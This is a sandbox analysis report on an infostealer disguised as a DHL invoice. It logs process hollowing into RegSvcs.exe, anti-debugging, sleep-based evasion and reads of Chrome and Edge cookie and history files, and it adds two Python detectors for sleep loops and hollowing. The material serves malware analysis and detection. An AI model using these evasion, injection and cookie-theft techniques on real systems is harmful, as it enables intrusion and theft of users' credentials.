Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595429
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2545
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7279
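Read top to bottom, the delay list above is the footprint of a loop that re-computes its remaining wait on every iteration rather than sleeping once: the first request is 922337203685477 ms, which is TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks divided by 10000) and far more than a Win32 Sleep(DWORD) could even carry, and the fifty requests that follow start at 600000 ms and shrink by roughly 110 to 130 ms per call, consistent with each decrement being the wall-clock time that passed between one Sleep call and the next. The Python below is an added example, not part of the Joe Sandbox report, that parses trace lines of this shape and flags both patterns. The 51 delay values are taken from this report and embedded as constructed log lines; the 5-minute, 1000 ms and 10-call thresholds are assumptions chosen for a sandbox run, not values from the report.

```python
"""Flag sleep-based sandbox evasion in an API trace of 'Thread delayed' lines."""
from __future__ import annotations

import re
import statistics
from dataclasses import dataclass

DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")

# 922337203685477 is TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks / 10000):
# a managed wait with no practical bound, not a duration anyone intends to let elapse.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000
DWORD_MAX = 2**32 - 1            # largest argument a Win32 Sleep(DWORD) can carry
LONG_SLEEP_MS = 5 * 60 * 1000    # assumption: anything past 5 minutes outlives a sandbox run
MAX_COUNTDOWN_STEP_MS = 1_000    # assumption: a re-computed wait shrinks by far less than this per call
MIN_COUNTDOWN_RUN = 10           # assumption: shorter runs are not worth reporting

# Constructed sample: the 51 delay values RegSvcs.exe requested in this report,
# wrapped in log lines of the shape the report uses.
_REPORTED_DELAYS = (
    922337203685477, 600000, 599875, 599766, 599653, 599547, 599437, 599328, 599219,
    599110, 598985, 598860, 598735, 598604, 598474, 598328, 598219, 598110, 597989,
    597860, 597735, 597610, 597485, 597360, 597235, 597110, 596985, 596860, 596735,
    596610, 596485, 596360, 596235, 596110, 595985, 595860, 595735, 595610, 595429,
    595313, 595200, 595094, 594969, 594860, 594735, 594610, 594485, 594360, 594235,
    594110, 593985,
)
SAMPLE_TRACE = [f"RegSvcs.exe Thread delayed: delay time: {v}" for v in _REPORTED_DELAYS]


@dataclass
class CountdownRun:
    start_ms: int          # first (largest) request in the run
    end_ms: int            # last (smallest) request in the run
    calls: int             # number of Sleep calls in the run
    median_step_ms: float  # typical shrink per call, i.e. wall-clock time the loop saw pass


@dataclass
class SleepFindings:
    requests: list[int]
    unbounded_waits: list[int]        # requests no Win32 Sleep could carry (> DWORD)
    long_sleeps: int                  # requests >= LONG_SLEEP_MS, unbounded ones included
    countdown_runs: list[CountdownRun]

    def suspicious(self) -> bool:
        return bool(self.unbounded_waits or self.long_sleeps or self.countdown_runs)


def parse_delays(lines) -> list[int]:
    """Extract the requested delay (ms) from every line that carries one, in trace order."""
    return [int(m.group(1)) for line in lines if (m := DELAY_RE.search(line))]


def find_countdown_runs(values, max_step=MAX_COUNTDOWN_STEP_MS, min_run=MIN_COUNTDOWN_RUN):
    """Find runs where each request is slightly smaller than the previous one.

    A loop of the form 'while now < deadline: Sleep(deadline - now)' produces exactly
    this: the requested value falls by however much wall-clock time the previous call
    consumed, so skipping or shortening sleeps in the sandbox does not shorten the loop
    unless the clock the loop reads is faked as well.
    """
    runs: list[CountdownRun] = []
    i = 0
    while i < len(values):
        j = i
        while j + 1 < len(values) and 0 < values[j] - values[j + 1] <= max_step:
            j += 1
        if j - i + 1 >= min_run:
            steps = [values[k] - values[k + 1] for k in range(i, j)]
            runs.append(CountdownRun(values[i], values[j], j - i + 1, statistics.median(steps)))
        i = j + 1
    return runs


def analyze(lines) -> SleepFindings:
    """Run every check over a trace and collect the findings."""
    values = parse_delays(lines)
    return SleepFindings(
        requests=values,
        unbounded_waits=[v for v in values if v > DWORD_MAX],
        long_sleeps=sum(1 for v in values if v >= LONG_SLEEP_MS),
        countdown_runs=find_countdown_runs(values),
    )


if __name__ == "__main__":
    f = analyze(SAMPLE_TRACE)
    tag = " (TimeSpan.MaxValue)" if TIMESPAN_MAX_MS in f.unbounded_waits else ""
    print("unbounded waits:", f.unbounded_waits, tag)
    for r in f.countdown_runs:
        print(f"countdown: {r.calls} calls from {r.start_ms} ms down to {r.end_ms} ms, "
              f"~{r.median_step_ms:.0f} ms of wall-clock per call")
    print("suspicious:", f.suspicious())
```

On the report's values this yields one run of 50 calls from 600000 ms down to 593985 ms with a median step of 125 ms; the practical consequence for a sandbox is that shortening individual sleeps only makes the loop spin faster, since the sample measures elapsed time itself.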
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | API coverage: 3.9 %
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0039DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0036C2A2 FindFirstFileExW
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A68EE FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0039D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0039D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A5C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd2c94d88c6ec6<
Source: RegSvcs.exe, 00000002.00000002.4474554709.000000000131B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003AEAA2 BlockInput
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00362622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00354CE8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00EB01E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00EB0188 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00EAEB78 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00390B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00362622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0035083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003509D5 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00350C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FBF008
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00391201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00372BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0039B226 SendInput,keybd_event
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003B22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe"
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00390B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00391663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: DHL DOC INV 191224.gz.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: DHL DOC INV 191224.gz.exe | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00350698 cpuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0038D27A GetUserNameW
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0036B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
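Three of the entries above are, taken together, the standard footprint of process hollowing into a signed .NET framework utility: an executable-and-writable section mapped into RegSvcs.exe, a write into RegSvcs.exe memory at FBF008, and RegSvcs.exe started with the dropper's own path as its entire command line, so argv[0] names a file in the user's Desktop folder rather than the image that is actually mapped. The Python below is an added example, not part of the Joe Sandbox report, that scores a process-creation event plus the cross-process writes aimed at it against that footprint. The events are constructed from this report's process tree (PIDs 2612 and 6608 as listed further down); the extra .NET host-binary names beyond RegSvcs.exe, the user-writable-path heuristic and the benign control event are assumptions added for contrast, not facts from the report.

```python
"""Score a process-creation event against the process-hollowing footprint in this report."""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# Signed .NET framework utilities that loaders pick as hollowing hosts. RegSvcs.exe is
# the one this report shows; the other names are an assumption added for coverage.
NET_HOST_BINARIES = {
    "regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe",
    "applaunch.exe", "aspnet_compiler.exe",
}

# Assumption: path fragments an unprivileged user can write under. A parent image
# living there is treated as a dropper until the other indicators say otherwise.
USER_WRITABLE_MARKERS = (
    "\\desktop\\", "\\downloads\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\",
)


@dataclass(frozen=True)
class ProcessCreate:
    pid: int
    image: str            # path of the executable actually mapped
    command_line: str     # command line the parent passed to CreateProcess
    parent_pid: int
    parent_image: str


@dataclass(frozen=True)
class CrossProcessWrite:
    source_pid: int
    target_pid: int
    kind: str             # "section_map" (NtMapViewOfSection) or "memory_write" (WriteProcessMemory)
    protection: str = ""  # e.g. "execute and read and write", as the sandbox reports it


def command_line_image(command_line: str) -> str:
    """Return argv[0] of a Windows command line, honouring a quoted first token."""
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(" ", 1)[0]


def hollowing_indicators(proc: ProcessCreate, writes: list[CrossProcessWrite]) -> list[str]:
    """Name every hollowing indicator the event and its cross-process writes exhibit."""
    reasons: list[str] = []
    image_name = ntpath.basename(proc.image).lower()
    if image_name in NET_HOST_BINARIES:
        reasons.append("net-host-binary")
    # A hollowed child keeps whatever command line the parent supplied; droppers
    # routinely pass their own path, so argv[0] no longer names the mapped image.
    if ntpath.basename(command_line_image(proc.command_line)).lower() != image_name:
        reasons.append("cmdline-image-mismatch")
    if any(marker in proc.parent_image.lower() for marker in USER_WRITABLE_MARKERS):
        reasons.append("parent-in-user-writable-path")
    for w in writes:
        if (w.source_pid, w.target_pid) != (proc.parent_pid, proc.pid):
            continue
        if w.kind == "section_map" and "execute" in w.protection and "write" in w.protection:
            reasons.append("rwx-section-mapped-by-parent")
        elif w.kind == "memory_write":
            reasons.append("memory-written-by-parent")
    return reasons


def is_hollowing_candidate(proc: ProcessCreate, writes: list[CrossProcessWrite]) -> bool:
    """Require payload delivery by the parent plus a launch anomaly, so a debugger or
    profiler that legitimately writes into its own child does not fire on its own."""
    found = set(hollowing_indicators(proc, writes))
    delivered = bool(found & {"rwx-section-mapped-by-parent", "memory-written-by-parent"})
    anomalous = bool(found & {"cmdline-image-mismatch", "parent-in-user-writable-path"})
    return delivered and anomalous


# Constructed from the process tree in this report: the dropper (PID 2612) starts
# RegSvcs.exe (PID 6608) with the dropper's own path as command line, maps an RWX
# section into it and writes to its memory.
DROPPER = r"C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
SAMPLE_CHILD = ProcessCreate(6608, REGSVCS, f'"{DROPPER}"', 2612, DROPPER)
SAMPLE_WRITES = [
    CrossProcessWrite(2612, 6608, "section_map", "execute and read and write"),
    CrossProcessWrite(2612, 6608, "memory_write"),
]
# Constructed benign control (hypothetical installer path): same host binary, its own
# path as argv[0], no writes from the parent.
BENIGN_CHILD = ProcessCreate(
    4100, REGSVCS, f'"{REGSVCS}" /tlb:Vendor.tlb Vendor.dll', 900,
    r"C:\Program Files\Vendor\setup.exe",
)

if __name__ == "__main__":
    for proc in (SAMPLE_CHILD, BENIGN_CHILD):
        print(proc.pid, hollowing_indicators(proc, SAMPLE_WRITES),
              is_hollowing_candidate(proc, SAMPLE_WRITES))
```

The same logic maps directly onto endpoint telemetry that records process creation with parent and command line alongside cross-process memory writes; the command-line mismatch is the cheapest of the indicators, since it needs no memory-access events at all.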

                  Stealing of Sensitive Information

                  barindex
Source: Yara match; File source: 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: DHL DOC INV 191224.gz.exe PID: 2612, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 6608, type: MEMORYSTR
Source: Yara match; File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: DHL DOC INV 191224.gz.exe PID: 2612, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 6608, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: WIN_81
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: WIN_XP
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: WIN_XPe
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: WIN_VISTA
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: WIN_7
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: WIN_8
Source: Yara match; File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: DHL DOC INV 191224.gz.exe PID: 2612, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 6608, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
Source: Yara match; File source: 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: DHL DOC INV 191224.gz.exe PID: 2612, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 6608, type: MEMORYSTR
